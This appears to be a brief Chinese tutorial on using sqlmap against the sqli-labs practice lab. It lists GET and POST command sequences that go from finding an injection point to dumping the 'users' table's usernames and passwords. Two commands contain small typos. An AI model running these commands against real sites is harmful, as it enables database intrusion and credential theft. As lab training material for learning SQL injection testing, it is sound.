sqlmap使用(以sqli-lab为例)

1.get使用方法：（Less-1 **Error Based- String**）

1.查看是否有注入点：sqlmap -u 网址
2.爆出数据库名：sqlmap -u 网址 --dbs
3.爆出数据库表名  sqlmap -u 网址 -D 'security' --tables
4.爆出指定表的列名：  sqlmap -u 网址 -D 'security' -T 'users' --columns
5.dump出数据：sqlmap -u -D security -T users -C id,password,username --dump

2.post使用方法：（Less-11- Error Based- String）
1.使用burp抓包，将请求内容保存在txt文件中（或者使用-u 网址 --data ‘data’来代替）
sqlmap -r   文件位置
2.爆出数据库名：sqlmap -r 文件位置 --dbs
3.爆出表名：sqlmap -r 文件位置 -D XXX --tables
4.爆出列名：sqlmap -r 文件位置 -D xxx -T xxx -columns
5.dump出数据： sqlmap -r 文件位置 -D xxx -T xxx -C xxx --dump

Less-12- Error Based- Double quotes- String

参考链接：

详细sqli-labs（1-65）通关讲解_数据库_糊涂是福yyyy-DevPress官方社区 (csdn.net)